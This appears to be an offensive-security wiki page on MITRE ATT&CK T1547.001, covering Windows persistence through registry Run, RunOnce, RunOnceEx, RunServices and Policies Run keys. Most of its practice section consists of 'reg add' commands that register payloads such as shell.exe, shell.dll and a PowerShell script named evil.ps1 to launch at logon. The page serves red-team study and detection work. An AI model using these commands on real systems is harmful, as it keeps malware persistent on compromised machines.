Run Keys

MITRE ATT&CK™ Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder - Technique T1547.001

Theory

We may achieve persistence by referencing a program with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.

Practice

Registry entries under HKU/HKCU will only apply to the user. Registry entries under HKLM will apply to everyone

Run/RunServices keys will run every time a user logs in.

RunOnce/RunServicesOnce will clears the registry key as soon as it run.

You can force a user to execute a program on logon via the Run and RunOnce and RunOnceEx registry keys. You can use the following registry entries to specify applications to run at logon:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

The RunOnceEx key entries can reference programs directly or list them as a dependency. For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx.

RunOnceEx only executes from HKEY_LOCAL_MACHINE (HKLM)

RunOnceEx clears the registry key on completion of the command.

#Run/RunOnce
## Add key for current user
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v PeMalware /t REG_SZ /d "C:\Users\user1\shell.exe"
## Add key for computer (all users)
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v PeMalware /t REG_SZ /d "C:\Users\user1\shell.exe"

#RunOnceEx
#Add key for current user - Execute command / PE
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" /v PeMalware /t REG_SZ /d "C:\tmp\shell.exe"
#Add key for computer (all users) - Execute DLL
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend" /v DLLMalware /t REG_SZ /d "C:\tmp\shell.dll"

The following Registry keys can control automatic startup of services during boot:

HKU\<SID>\Software\Microsoft\Windows\CurrentVersion\RunServices
HKU\<SID>\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

#Add key for current user - Execute command / PE
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pwned /t REG_SZ /d "C:\tmp\Pwned.exe"

#Add key for computer (all users) - Execute command / PE
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pwned /t REG_SZ /d "C:\tmp\Pwned.exe"

We can use policy settings to specify startup programs with following registry keys

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

#Add key for current user - Execute command / PE
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v Pwned /t REG_SZ /d "C:\tmp\Pwned.exe"

#Add key for computer (all users) - Execute command
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v Pwned /t REG_SZ /d "powershell.exe C:\tmp\evil.ps1"

References

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Sub-technique T1547.001 - Enterprise | MITRE ATT&CK®

Last updated 8 months ago